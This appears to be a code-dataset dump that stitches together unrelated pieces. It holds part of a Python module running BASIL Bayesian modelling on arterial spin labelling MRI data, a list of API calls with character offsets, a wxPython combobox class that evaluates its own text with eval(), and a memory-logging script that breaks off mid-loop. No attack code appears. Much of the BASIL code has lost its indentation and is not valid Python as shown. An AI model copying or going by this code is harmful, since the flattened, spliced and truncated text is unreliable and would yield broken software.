    wsp.log.write("\nRunning BASIL Bayesian modelling on ASL data in '%s' data space\n" % wsp.ifnone("image_space", "native"))
    # Single or Multi TI setup
    if wsp.asldata.ntis == 1:
        # Single TI data - don't try to infer arterial component of bolus duration, we don't have enough info
        wsp.log.write(" - Operating in Single TI mode - no arterial component, fixed bolus duration\n")
        wsp.inferart = False
        wsp.infertau = False
        batsd_default = 0.1
    else:
        # For multi TI/PLD data, set a more liberal prior for tissue ATT since we should be able to
        # determine this from the data. NB this leaves the arterial BAT alone.
        batsd_default = 1
    if wsp.wp:
        # White paper mode - this overrides defaults, but can be overwritten by command line
        # specification of individual parameters
        wsp.log.write(" - Analysis in white paper mode: T1 default=1.65, BAT default=0, voxelwise calibration\n")
        t1_default = 1.65
        bat_default = 0.0
    else:
        t1_default = 1.3
        if wsp.asldata.casl:
            bat_default = 1.3
        else:
            bat_default = 0.7
    # Apply the defaults chosen above only where the user has not
    # supplied an explicit value on the workspace.
    if wsp.t1 is None:
        wsp.t1 = t1_default
    if wsp.t1b is None:
        wsp.t1b = 1.65
    if wsp.bat is None:
        wsp.bat = bat_default
    if wsp.batsd is None:
        wsp.batsd = batsd_default
    if wsp.infertiss is None:
        wsp.infertiss = True
    # if we are doing CASL then fix the bolus duration, unless explicitly told us otherwise
    if wsp.infertau is None:
        wsp.infertau = not wsp.asldata.casl
    # Pick up extra BASIL options (copied so later mutations here do not
    # affect the caller's dict)
    wsp.basil_options = dict(wsp.ifnone("basil_options", {}))
    mask_policy = wsp.ifnone("basil_mask", "default")
    if mask_policy in ("default", "dilated"):
        wsp.log.write(" - Using pipeline analysis mask\n")
        # Two possible locations for compatibility
        if wsp.rois is not None and wsp.rois.mask is not None:
            mask = wsp.rois.mask
        else:
            mask = wsp.mask
        if mask_policy == "dilated":
            # Use 3x3x3 kernel for compatibility with fslmaths default
            wsp.log.write(" - Dilating mask for Basil analysis\n")
            struct = scipy.ndimage.generate_binary_structure(3, 3)
            # NOTE(review): np.int was removed in NumPy >= 1.24; this line
            # needs int or np.int_ on modern NumPy — confirm pinned version.
            mask = Image(scipy.ndimage.binary_dilation(mask.data, structure=struct).astype(np.int), header=mask.header)
    elif mask_policy == "none":
        wsp.log.write(" - Not using mask for Basil - will fit every voxel\n")
        mask = Image(np.ones(wsp.asldata.data.shape[:3]), header=wsp.asldata.header)
    else:
        raise ValueError("Unrecognized mask policy: %s" % mask_policy)
    # If we only have one volume, set a nominal noise prior as it is not possible to
    # estimate from the data
    if wsp.asldata.nvols / wsp.asldata.ntc == 1:
        wsp.log.write(" - Restricting noise prior as only one ASL volume\n")
        wsp.basil_options["prior-noise-stddev"] = 1.0
    if prefit and max(wsp.asldata.rpts) > 1:
        # Initial BASIL run on mean data; the resulting MVN seeds the
        # main fit via "continue-from-mvn"
        wsp.log.write(" - Doing initial fit on mean at each TI\n\n")
        init_wsp = wsp.sub("init")
        main_wsp = wsp.sub("main")
        basil_fit(init_wsp, wsp.asldata.mean_across_repeats(), mask=mask)
        wsp.basil_options["continue-from-mvn"] = wsp.init.finalstep.finalMVN
        main_wsp.initmvn = wsp.basil_options["continue-from-mvn"]
    else:
        main_wsp = wsp
    # Main run on full ASL data
    wsp.log.write("\n - Doing fit on full ASL data\n\n")
    basil_fit(main_wsp, wsp.asldata, mask=mask)
    wsp.finalstep = main_wsp.finalstep
def basil_fit(wsp, asldata, mask=None):
"""
Run Bayesian model fitting on ASL data
See ``basil`` for details of workspace attributes used
:param wsp: Workspace object
:param asldata: AslImage object to use as input data
"""
if len(asldata.tes) > 1:
steps = basil_steps_multite(wsp, asldata, mask)
else:
steps = basil_steps(wsp, asldata, mask)
prev_result = None
wsp.asldata_diff = asldata.diff().reorder("rt")
wsp.basil_mask = mask
for idx, step in enumerate(steps):
step_wsp = wsp.sub("step%i" % (idx+1))
desc = "Step %i of %i: %s" % (idx+1, len(steps), step.desc)
if prev_result is not None:
desc += " - Initialise with step %i" % idx
step_wsp.log.write(desc + " ")
result = step.run(prev_result, log=wsp.log, fsllog=wsp.fsllog,
fabber_corelib=wsp.fabber_corelib, fabber_libs=wsp.fabber_libs,
fabber_coreexe=wsp.fabber_coreexe, fabber_exes=wsp.fabber_exes)
for key, value in result.items():
if key == "modelfit":
# Treat model fit specially - make it an AslImage and also output a mean
# across repeats version for comparison
value = wsp.asldata_diff.derived(value.data, header=value.header)
modelfit_mean = value.mean_across_repeats()
setattr(step_wsp, "modelfit_mean", modelfit_mean)
setattr(step_wsp, key, value)
if step_wsp.logfile is not None and step_wsp.savedir is not None:
step_wsp.set_item("logfile", step_wsp.logfile, save_fn=str)
prev_result = result
wsp.finalstep = step_wsp
wsp.log.write("\nEnd\n")
def _calc_slicedt(wsp, options):
"""
Calculate the slicedt for basil given that we may be quantifying in
a space other than the usual ASL space
We do this by generating a slice time offset image and transforming it
to quantification space. Since this could be rotated wrt to the asl data
we may need to warn if the resulting image has significant slice time variation
across X or Y axes
"""
img_space = wsp.ifnone("image_space", "native")
if img_space != "native":
asldata = options["data"]
_x, _y, z, _t = np.indices(list(asldata.data.shape[:3]) + [asldata.ntis,])
print(z.shape)
tis_arr = np.array(asldata.tis) + (z.astype(np.float32) * options["slicedt"])
print(tis_arr.shape)
tis_img = Image(tis_arr, header=options["data"].header)
wsp.tiimg = reg.change_space(wsp, tis_img, wsp.ifnone("image_space", "native"))
#print(ztrans.data)
print(wsp.tiimg.data.shape)
del options["slicedt"]
ti_idx = 1
while "ti%i" % ti_idx in options:
del options["ti%i" % ti_idx]
ti_idx += 1
options["tiimg"] = wsp.tiimg
def basil_steps(wsp, asldata, mask=None):
"""
Get the steps required for a BASIL run
This is separated for the case where an alternative process wants to run
the actual modelling, or so that the steps can be checked prior to doing
an actual run.
Arguments are the same as the ``basil`` function. No workspace is required.
"""
if asldata is None:
raise ValueError("Input ASL data is None")
wsp.log.write("BASIL v%s\n" % __version__)
asldata.summary(log=wsp.log)
asldata = asldata.diff().reorder("rt")
# Default Fabber options for VB runs and spatial steps. Note that attributes
# which are None (e.g. sliceband) are not passed to Fabber
options = {
"data" : asldata,
"model" : "aslrest",
"disp" : "none",
"exch" : "mix",
"method" : "vb",
"noise" : "white",
"allow-bad-voxels" : True,
"max-iterations" : 20,
"convergence" : "trialmode",
"max-trials" : 10,
"save-mean" : True,
"save-mvn" : True,
"save-std" : True,
"save-model-fit" : True,
"save-residuals" : wsp.ifnone("output_residuals", False),
}
if mask is not None:
options["mask"] = mask
# We choose to pass TIs (not PLDs). The asldata object ensures that
# TIs are correctly derived from PLDs, when these are specified, by adding
# the bolus duration.
for idx, ti in enumerate(asldata.tis):
options["ti%i" % (idx+1)] = ti
options["rpt%i" % (idx+1)] = asldata.rpts[idx]
# Bolus duration - use a single value where possible as cannot infer otherwise
taus = getattr(asldata, "taus", [1.8,])
if min(taus) == max(taus):
options["tau"] = taus[0]
else:
for idx, tau in enumerate(taus):
options["tau%i" % (idx+1)] = tau
# Other asl data parameters
for attr in ("casl", "slicedt", "sliceband"):
if getattr(asldata, attr, None) is not None:
options[attr] = getattr(asldata, attr)
_calc_slicedt(wsp, options)
if wsp.noiseprior:
# Use an informative noise prior
if wsp.noisesd is None:
snr = wsp.ifnone("snr", 10)
wsp.log.write(" - Using SNR of %f to set noise std dev\n" % snr)
# Estimate signal magntiude FIXME diffdata_mean is always 3D?
if wsp.diffdata_mean.ndim > 3:
datamax = np.amax(wsp.diffdata_mean.data, 3)
else:
datamax = wsp.diffdata_mean.data
brain_mag = np.mean(datamax.data[mask.data != 0])
# this will correspond to whole brain CBF (roughly) - about 0.5 of GM
noisesd = math.sqrt(brain_mag * 2 / snr)
else:
noisesd = wsp.noisesd
wsp.log.write(" - Using a prior noise sd of: %f\n" % noisesd)
options["prior-noise-stddev"] = noisesd
# Add Basil-specific options defined on the workspace
options.update(wsp.ifnone("basil_options", {}))
# Additional optional workspace arguments
for attr in ("t1", "t1b", "bat", "FA", "pwm", "pgm", "batsd"):
value = getattr(wsp, attr)
if value is not None:
options[attr] = value
# Options for final spatial step
prior_type_spatial = "M"
prior_type_mvs = "A"
options_svb = {
"method" : "spatialvb",
"param-spatial-priors" : "N+",
"convergence" : "maxits",
"max-iterations": 20,
}
wsp.log.write("Model (in fabber) is : %s\n" % options["model"])
wsp.log.write("Dispersion model option is %s\n" % options["disp"])
wsp.log.write("Compartment exchange model option is %s\n" % options["exch"])
inferdisp = options["disp"] != "none"
inferexch = options["exch"] != "mix"
# Partial volume correction
pvcorr = "pgm" in options or "pwm" in options
if pvcorr:
if not wsp.infertiss:
raise ValueError("ERROR: PV correction is not compatible with --artonly option (there is no tissue component)")
options["incpve"] = True
if "pgm" not in options or "pwm" not in options:
raise ValueError("Only one partial volume map (GM / WM) was supplied for PV correctioN")
# Need a spatial step with more iterations for the PV correction
wsp.spatial = True
options_svb["max-iterations"] = 200
# Ignore partial volumes below 0.1
pgm_img = options.pop("pgm")
pwm_img = options.pop("pwm")
pgm = np.copy(pgm_img.data)
pwm = np.copy(pwm_img.data)
pgm[pgm < 0.1] = 0
pgm[pgm > 1] = 1
pwm[pwm < 0.1] = 0
pwm[pwm > 1] = 1
pgm = Image(pgm, header=pgm_img.header)
pwm = Image(pwm, header=pwm_img.header)
# Set general parameter inference and inclusion
if wsp.infertiss:
options["inctiss"] = True
if wsp.inferbat:
options["incbat"] = True
options["inferbat"] = True # Infer in first step
if wsp.inferart:
options["incart"] = True
if wsp.inferpc:
options["incpc"] = True
if wsp.infertau:
options["inctau"] = True
if wsp.infert1:
options["inct1"] = True
# Keep track of the number of spatial priors specified by name
spriors = 1
if wsp.initmvn:
# we are being supplied with an initial MVN
wsp.log.write("Initial MVN being loaded %s\n" % wsp.initmvn.name)
options["continue-from-mvn"] = wsp.initmvn
# T1 image prior
if wsp.t1im is not None:
spriors = _add_prior(options, spriors, "T_1", type="I", image=wsp.t1im)
# BAT image prior
if wsp.batim is not None:
# With a BAT image prior we must include BAT even if we are not inferring it
# (in this case the image prior will be treated as ground truth)
spriors = _add_prior(options, spriors, "delttiss", type="I", image=wsp.batim)
options["incbat"] = True
steps = []
components = ""
### --- TISSUE MODULE ---
if wsp.infertiss:
components += " Tissue "
options["infertiss"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
# setup spatial priors ready
spriors = _add_prior(options_svb, spriors, "ftiss", type=prior_type_spatial)
### --- ARTERIAL MODULE ---
if wsp.inferart:
components += " Arterial "
options["inferart"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
# setup spatial priors ready
spriors = _add_prior(options_svb, spriors, "fblood", type=prior_type_mvs)
### --- BOLUS DURATION MODULE ---
if wsp.infertau:
components += " Bolus duration "
options["infertau"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- MODEL EXTENSIONS MODULE ---
# Add variable dispersion and/or exchange parameters and/or pre-capiliary
if inferdisp or inferexch or wsp.inferpc:
if inferdisp:
components += " dispersion"
options["inferdisp"] = True
if inferexch:
components += " exchange"
options["inferexch"] = True
if wsp.inferpc:
components += " pre-capiliary"
options["inferpc"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- T1 MODULE ---
if wsp.infert1:
components += " T1 "
options["infert1"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- PV CORRECTION MODULE ---
if pvcorr:
# setup ready for PV correction, which has to be done with spatial priors
components += " PVE"
options["pvcorr"] = True
# set the image priors for the PV maps
spriors = _add_prior(options, spriors, "pvgm", type="I", image=pgm)
spriors = _add_prior(options, spriors, "pvwm", type="I", image=pwm)
spriors = _add_prior(options, spriors, "fwm", type="M")
if steps:
# Add initialisaiton step for PV correction - ONLY if we have something to init from
steps.append(PvcInitStep(wsp, {"data" : asldata, "mask" : mask, "pgm" : pgm, "pwm" : pwm}, "PVC initialisation"))
### --- SPATIAL MODULE ---
if wsp.spatial:
step_desc = "Spatial VB - %s" % components
options.update(options_svb)
del options["max-trials"]
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- SINGLE-STEP OPTION ---
if wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
if not steps:
raise ValueError("No steps were generated - no parameters were set to be inferred")
return steps
def basil_steps_multite(wsp, asldata, mask=None, **kwargs):
"""
Get the steps required for a BASIL run on multi-TE data
This is separated for the case where an alternative process wants to run
the actual modelling, or so that the steps can be checked prior to doing
an actual run.
Arguments are the same as the ``basil`` function.
"""
if asldata is None:
raise ValueError("Input ASL data is None")
wsp.log.write("BASIL v%s\n" % __version__)
asldata.summary(log=wsp.log)
asldata = asldata.diff().reorder("rt")
# Default Fabber options for VB runs and spatial steps. Note that attributes
# which are None (e.g. sliceband) are not passed to Fabber
options = {
"data" : asldata,
"model" : "asl_multite",
"method" : "vb",
"noise" : "white",
"allow-bad-voxels" : True,
"max-iterations" : 20,
"convergence" : "trialmode",
"max-trials" : 10,
"save-mean" : True,
"save-mvn" : True,
"save-std" : True,
"save-model-fit" : True,
}
if mask is not None:
options["mask"] = mask
# We choose to pass TIs (not PLDs). The asldata object ensures that
# TIs are correctly derived from PLDs, when these are specified, by adding
# the bolus duration.
_list_option(options, asldata.tis, "ti")
# Pass multiple TEs
_list_option(options, asldata.tes, "te")
# Bolus duration must be constant for multi-TE model
if min(asldata.taus) != max(asldata.taus):
raise ValueError("Multi-TE model does not support variable bolus durations")
else:
options["tau"] = asldata.taus[0]
# Repeats must be constant for multi-TE model
if min(asldata.rpts) != max(asldata.rpts):
raise ValueError("Multi-TE model does not support variable repeats")
else:
options["repeats"] = asldata.rpts[0]
# Other asl data parameters
for attr in ("casl", "slicedt", "sliceband"):
if getattr(asldata, attr, None) is not None:
options[attr] = getattr(asldata, attr)
# Keyword arguments override options
options.update(kwargs)
# Additional optional workspace arguments
for attr in ("t1", "t1b", "t2", "t2b"):
value = getattr(wsp, attr)
if value is not None:
if attr.startswith("t2"):
# Model expects T2 in seconds not ms
options[attr] = float(value) / 1000
else:
options[attr] = value
# Options for final spatial step
prior_type_spatial = "M"
prior_type_mvs = "A"
options_svb = {
"method" : "spatialvb",
"param-spatial-priors" : "N+",
"convergence" : "maxits",
"max-iterations": 20,
}
wsp.log.write("Model (in fabber) is : %s\n" % options["model"])
# Set general parameter inference and inclusion
if not wsp.infertiss:
wsp.log.write("WARNING: infertiss=False but ftiss is always inferred in multi-TE model\n")
if not wsp.inferbat:
wsp.log.write("WARNING: inferbat=False but BAT is always inferred in multi-TE model\n")
if wsp.inferart:
wsp.log.write("WARNING: inferart=True but multi-TE model does not support arterial component\n")
if wsp.infertau:
options["infertau"] = True
if wsp.infert1:
options["infert1"] = True
if wsp.infert2:
options["infert2"] = True
# Keep track of the number of spatial priors specified by name
spriors = 1
if wsp.initmvn:
# we are being supplied with an initial MVN
wsp.log.write("Initial MVN being loaded %s\n" % wsp.initmvn.name)
options["continue-from-mvn"] = wsp.initmvn
# T1 image prior
if wsp.t1im:
spriors = _add_prior(options, spriors, "T_1", type="I", image=wsp.t1im)
# BAT image prior
if wsp.batim is not None:
# With a BAT image prior we must include BAT even if we are not inferring it
# (in this case the image prior will be treated as ground truth)
spriors = _add_prior(options, spriors, "delttiss", type="I", image=wsp.batim)
options["incbat"] = True
steps = []
components = ""
### --- TISSUE MODULE ---
#if wsp.infertiss:
if True:
components += " Tissue"
### Inference options
if wsp.infertau:
components += " Bolus duration"
options["infertau"] = True
if wsp.infert1:
components += " T1"
options["infert1"] = True
if wsp.infertexch:
components += " Exchange time"
options["infertexch"] = True
step_desc = "VB - %s" % components
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
# Setup spatial priors ready
spriors = _add_prior(options_svb, spriors, "ftiss", type=prior_type_spatial)
### --- SPATIAL MODULE ---
if wsp.spatial:
step_desc = "Spatial VB - %s" % components
options.update(options_svb)
del options["max-trials"]
if not wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
### --- SINGLE-STEP OPTION ---
if wsp.onestep:
steps.append(FabberStep(wsp, options, step_desc))
if not steps:
raise ValueError("No steps were generated - no parameters were set to be inferred")
return steps
def _list_option(options, values, name):
for idx, value in enumerate(values):
options["%s%i" % (name, idx+1)] = value
def _add_prior(options, prior_idx, param, **kwargs):
options["PSP_byname%i" % prior_idx] = param
for key, value in kwargs.items():
options["PSP_byname%i_%s" % (prior_idx, key)] = value
return prior_idx + 1
class Step(object):
"""
A step in the Basil modelling process
"""
def __init__(self, wsp, options, desc):
self.options = dict(options)
self.desc = desc
# Need to convert all images to target image space
for key in list(options.keys()):
poss_img = self.options[key]
if isinstance(poss_img, Image):
image_space = wsp.ifnone("image_space", "native")
self.options[key] = reg.change_space(wsp, poss_img, image_space, mask=(key == 'mask'))
class FabberStep(Step):
"""
A Basil step which involves running Fabber
"""
def run(self, prev_output, log=sys.stdout, fsllog=None, **kwargs):
"""
Run Fabber, initialising it from the output of a previous step
"""
if prev_output is not None:
self.options["continue-from-mvn"] = prev_output["finalMVN"]
from .wrappers import fabber
ret = fabber(self.options, output=LOAD, progress_log=log, log=fsllog, **kwargs)
log.write("\n")
return ret
class PvcInitStep(Step):
"""
A Basil step which initialises partial volume correction
"""
def run(self, prev_output, log=sys.stdout, fsllog=None, **kwargs):
"""
Update the MVN from a previous step to include initial estimates
for PVC parameters
"""
log.write("Initialising partial volume correction...\n")
# set the inital GM amd WM values using a simple PV correction
wm_cbf_ratio = 0.4
# Modified pvgm map
temp_pgm = np.copy(self.options["pgm"].data)
temp_pgm[temp_pgm < 0.2] = 0.2
# First part of correction psuedo WM CBF term
prev_ftiss = prev_output["mean_ftiss"].data
wm_cbf_term = (prev_ftiss * wm_cbf_ratio) * self.options["pwm"].data
gmcbf_init = (prev_ftiss - wm_cbf_term) / temp_pgm
wmcbf_init = gmcbf_init * wm_cbf_ratio
mvn = prev_output["finalMVN"]
gmcbf_init = Image(gmcbf_init, header=mvn.header)
wmcbf_init = Image(wmcbf_init, header=mvn.header)
# HACK: This seems to be required to get the fslpy decorators to write
# the temporary file correctly
mask = Image(self.options["mask"].data, header=self.options["mask"].header)
# load these into the MVN
mvn = prev_output["finalMVN"]
from .wrappers import mvntool
params = prev_output["paramnames"]
mvn = mvntool(mvn, params.index("ftiss")+1, output=LOAD, mask=mask, write=True, valim=gmcbf_init, var=0.1, log=fsllog)["output"]
mvn = mvntool(mvn, params.index("fwm")+1, output=LOAD, mask=mask, write=True, valim=wmcbf_init, var=0.1, log=fsllog)["output"]
log.write("DONE\n")
return {"finalMVN" : mvn, "gmcbf_init" : gmcbf_init, "wmcbf_init" : wmcbf_init}
class BasilOptions(OptionCategory):
"""
BASIL option category
"""
def __init__(self):
OptionCategory.__init__(self, "basil")
def groups(self, parser):
groups = []
group = OptionGroup(parser, "BASIL options")
group.add_option("--infertau", help="Infer bolus duration", action="store_true", default=False)
group.add_option("--inferart", help="Infer macro vascular (arterial) signal component (not supported for multi-TE data)", action="store_true", default=False)
group.add_option("--inferpc", help="Infer pre-capillary signal component (not supported for multi-TE data)", action="store_true", default=False)
group.add_option("--infert1", help="Include uncertainty in T1 values", action="store_true", default=False)
group.add_option("--infertexch", help="Infer exchange time (multi-TE data only)", action="store_true", default=False)
group.add_option("--artonly", help="Remove tissue component and infer only arterial component (not supported for multi-TE data)", action="store_true", default=False)
group.add_option("--fixbat", help="Fix bolus arrival time", action="store_false", default=True)
group.add_option("--batsd", help="Bolus arrival time standard deviation (s) - default 1.0 for multi-PLD, 0.1 otherwise", type=float)
group.add_option("--spatial", help="Add step that implements adaptive spatial smoothing on CBF", action="store_true", default=False)
group.add_option("--fast", help="Faster analysis (1=faster, 2=single step", type=int, default=0)
group.add_option("--noiseprior", help="Use an informative prior for the noise estimation", action="store_true", default=False)
group.add_option("--noisesd", help="Set a custom noise std. dev. for the nosie prior", type=float)
group.add_option("--basil-mask", help="Masking policy to use for Basil model fitting. Does not affect analysis mask used in rest of pipeline. 'dilate' means dilate the default analysis mask. 'none' means use no masking",
type="choice", choices=["default", "dilated", "none"])
group.add_option("--basil-options", "--fit-options", help="File containing additional options for model fitting step", type="optfile")
groups.append(group)
group = OptionGroup(parser, "Model options")
group.add_option("--disp", help="Model for label dispersion", default="none")
group.add_option("--exch", help="Model for tissue exchange (residue function)", default="mix")
groups.append(group)
group = OptionGroup(parser, "Partial volume correction / CBF estimation (enforces --spatial)")
group.add_option("--pgm", help="Gray matter PV map", type="image")
group.add_option("--pwm", help="White matter PV map", type="image")
groups.append(group)
group = OptionGroup(parser, "Special options")
group.add_option("--t1im", help="Voxelwise T1 tissue estimates", type="image")
group.add_option("--batim", "--attim", help="Voxelwise BAT (ATT) estimates in seconds", type="image")
groups.append(group)
return groups
def main():
"""
Entry point for BASIL command line application
"""
try:
parser = AslOptionParser(usage="basil -i <ASL input file> [options...]", version=__version__)
parser.add_category(image.AslImageOptions())
parser.add_category(BasilOptions())
parser.add_category(GenericOptions())
options, _ = parser.parse_args(sys.argv)
if not options.output:
options.output = "basil"
if not options.asldata:
sys.stderr.write("Input file not specified\n")
parser.print_help()
sys.exit(1)
asldata = AslImage(options.asldata, **parser.filter(options, "image"))
wsp = Workspace(savedir=options.output, **vars(options))
wsp.asldata = asldata
# Deal with --artonly
if wsp.artonly:
wsp.infertiss = False
wsp.inferart = True
# Adjust number of iterations based on fast option
if not wsp.fast:
num_iter, num_trials, onestep = 20, 10, False
elif wsp.fast == 1:
num_iter, num_trials, onestep = 5, 2, False
elif wsp.fast == 2:
num_iter, num_trials, onestep = 10, 5, True
else:
raise ValueError("Not a valid option for fast: %s" % str(wsp.fast))
wsp.max_iterations = num_iter
wsp.max_trials = num_trials
wsp.onestep = onestep
# Run BASIL processing, passing options as keyword arguments using **
basil(wsp)
except ValueError as exc:
sys.stderr.write("\nERROR: " + str(exc) + "\n")
sys.stderr.write("Use --help for usage information\n")
sys.exit(1)
if __name__ == "__main__":
main()
|
[
"oxasl.image.AslImageOptions",
"numpy.copy",
"math.sqrt",
"oxasl.options.OptionGroup",
"numpy.ones",
"fsl.data.image.Image",
"numpy.amax",
"sys.stderr.write",
"numpy.mean",
"numpy.array",
"oxasl.reg.change_space",
"oxasl.options.AslOptionParser",
"oxasl.options.GenericOptions",
"sys.exit",
"oxasl.options.OptionCategory.__init__"
] |
[((9452, 9497), 'fsl.data.image.Image', 'Image', (['tis_arr'], {'header': "options['data'].header"}), "(tis_arr, header=options['data'].header)\n", (9457, 9497), False, 'from fsl.data.image import Image\n'), ((14347, 14368), 'numpy.copy', 'np.copy', (['pgm_img.data'], {}), '(pgm_img.data)\n', (14354, 14368), True, 'import numpy as np\n'), ((14383, 14404), 'numpy.copy', 'np.copy', (['pwm_img.data'], {}), '(pwm_img.data)\n', (14390, 14404), True, 'import numpy as np\n'), ((14523, 14556), 'fsl.data.image.Image', 'Image', (['pgm'], {'header': 'pgm_img.header'}), '(pgm, header=pgm_img.header)\n', (14528, 14556), False, 'from fsl.data.image import Image\n'), ((14571, 14604), 'fsl.data.image.Image', 'Image', (['pwm'], {'header': 'pwm_img.header'}), '(pwm, header=pwm_img.header)\n', (14576, 14604), False, 'from fsl.data.image import Image\n'), ((26244, 26277), 'numpy.copy', 'np.copy', (["self.options['pgm'].data"], {}), "(self.options['pgm'].data)\n", (26251, 26277), True, 'import numpy as np\n'), ((26668, 26704), 'fsl.data.image.Image', 'Image', (['gmcbf_init'], {'header': 'mvn.header'}), '(gmcbf_init, header=mvn.header)\n', (26673, 26704), False, 'from fsl.data.image import Image\n'), ((26726, 26762), 'fsl.data.image.Image', 'Image', (['wmcbf_init'], {'header': 'mvn.header'}), '(wmcbf_init, header=mvn.header)\n', (26731, 26762), False, 'from fsl.data.image import Image\n'), ((26897, 26965), 'fsl.data.image.Image', 'Image', (["self.options['mask'].data"], {'header': "self.options['mask'].header"}), "(self.options['mask'].data, header=self.options['mask'].header)\n", (26902, 26965), False, 'from fsl.data.image import Image\n'), ((27620, 27658), 'oxasl.options.OptionCategory.__init__', 'OptionCategory.__init__', (['self', '"""basil"""'], {}), "(self, 'basil')\n", (27643, 27658), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((27727, 27763), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""BASIL options"""'], 
{}), "(parser, 'BASIL options')\n", (27738, 27763), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((29833, 29869), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""Model options"""'], {}), "(parser, 'Model options')\n", (29844, 29869), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((30105, 30195), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""Partial volume correction / CBF estimation (enforces --spatial)"""'], {}), "(parser,\n 'Partial volume correction / CBF estimation (enforces --spatial)')\n", (30116, 30195), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((30389, 30427), 'oxasl.options.OptionGroup', 'OptionGroup', (['parser', '"""Special options"""'], {}), "(parser, 'Special options')\n", (30400, 30427), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((30783, 30872), 'oxasl.options.AslOptionParser', 'AslOptionParser', ([], {'usage': '"""basil -i <ASL input file> [options...]"""', 'version': '__version__'}), "(usage='basil -i <ASL input file> [options...]', version=\n __version__)\n", (30798, 30872), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((9336, 9357), 'numpy.array', 'np.array', (['asldata.tis'], {}), '(asldata.tis)\n', (9344, 9357), True, 'import numpy as np\n'), ((12408, 12445), 'numpy.mean', 'np.mean', (['datamax.data[mask.data != 0]'], {}), '(datamax.data[mask.data != 0])\n', (12415, 12445), True, 'import numpy as np\n'), ((12550, 12580), 'math.sqrt', 'math.sqrt', (['(brain_mag * 2 / snr)'], {}), '(brain_mag * 2 / snr)\n', (12559, 12580), False, 'import math\n'), ((30896, 30919), 'oxasl.image.AslImageOptions', 'image.AslImageOptions', ([], {}), '()\n', (30917, 30919), False, 'from oxasl import __version__, __timestamp__, AslImage, Workspace, image, reg\n'), 
((30993, 31009), 'oxasl.options.GenericOptions', 'GenericOptions', ([], {}), '()\n', (31007, 31009), False, 'from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions\n'), ((31174, 31220), 'sys.stderr.write', 'sys.stderr.write', (['"""Input file not specified\n"""'], {}), "('Input file not specified\\n')\n", (31190, 31220), False, 'import sys\n'), ((31265, 31276), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (31273, 31276), False, 'import sys\n'), ((32275, 32329), 'sys.stderr.write', 'sys.stderr.write', (['"""Use --help for usage information\n"""'], {}), "('Use --help for usage information\\n')\n", (32291, 32329), False, 'import sys\n'), ((32338, 32349), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (32346, 32349), False, 'import sys\n'), ((5836, 5871), 'numpy.ones', 'np.ones', (['wsp.asldata.data.shape[:3]'], {}), '(wsp.asldata.data.shape[:3])\n', (5843, 5871), True, 'import numpy as np\n'), ((12282, 12316), 'numpy.amax', 'np.amax', (['wsp.diffdata_mean.data', '(3)'], {}), '(wsp.diffdata_mean.data, 3)\n', (12289, 12316), True, 'import numpy as np\n'), ((25138, 25202), 'oxasl.reg.change_space', 'reg.change_space', (['wsp', 'poss_img', 'image_space'], {'mask': "(key == 'mask')"}), "(wsp, poss_img, image_space, mask=key == 'mask')\n", (25154, 25202), False, 'from oxasl import __version__, __timestamp__, AslImage, Workspace, image, reg\n')]
|
from typing import Optional, TYPE_CHECKING
import wx
if TYPE_CHECKING:
from gui.pane import FunctionPane
# noinspection PyPep8Naming
class ArrayControl(wx.ComboBox):
# noinspection PyShadowingBuiltins
def __init__(self, parent, id):
from functions import Function
choices = list(Function.get_all_vars().keys())
super().__init__(parent, id, choices=choices, value=choices[0])
def get_pane(self, window: wx.Window) -> "FunctionPane":
from gui.pane import FunctionPane
parent = window.GetParent()
if isinstance(parent, FunctionPane):
return parent
if parent is None:
raise ValueError("Could not find a FunctionPane parent for element")
return self.get_pane(parent)
def SetValue(self, value: Optional[str]):
if value is None:
self.SetSelection(0)
else:
super().SetValue(value)
def GetValue(self):
from gui.gui import MainFrame
frame: MainFrame = self.GetTopLevelParent()
return eval(super().GetValue(), frame.get_vars(self))
def GetCode(self):
return super().GetValue()
|
[
"functions.Function.get_all_vars"
] |
[((310, 333), 'functions.Function.get_all_vars', 'Function.get_all_vars', ([], {}), '()\n', (331, 333), False, 'from functions import Function\n')]
|
import sys
import csv
import datetime
import time
import argparse
from subprocess import Popen, PIPE
class Watcher:
def __init__(self, cmd, time_interval, filename):
self.cmd = cmd
self.time_interval = time_interval
self.filename = filename
self.outputfile = open(filename, 'w')
self.writer = csv.writer(self.outputfile)
self.meminfo_keys = list(self.parse_meminfo().keys())
self.writer.writerow(['timestamp'] + self.meminfo_keys)
@staticmethod
def parse_meminfo():
with open('/proc/meminfo') as meminfo:
lines = meminfo.readlines()
result = {}
for line in lines:
name, value = line.split(':')
value = value.strip()
if value.endswith('kB'):
value = int(value[:-2])*1000
else:
value = int(value)
result[name] = value
return result
def add_measure(self):
meminfo = self.parse_meminfo()
timestamp = str(datetime.datetime.now())
self.writer.writerow([timestamp] + [meminfo[k] for k in self.meminfo_keys])
return meminfo['MemAvailable']
def run_and_watch(self):
min_mem = self.add_measure()
max_mem = min_mem
proc = Popen(self.cmd, stdout=PIPE, stderr=PIPE)
while proc.poll() is None:
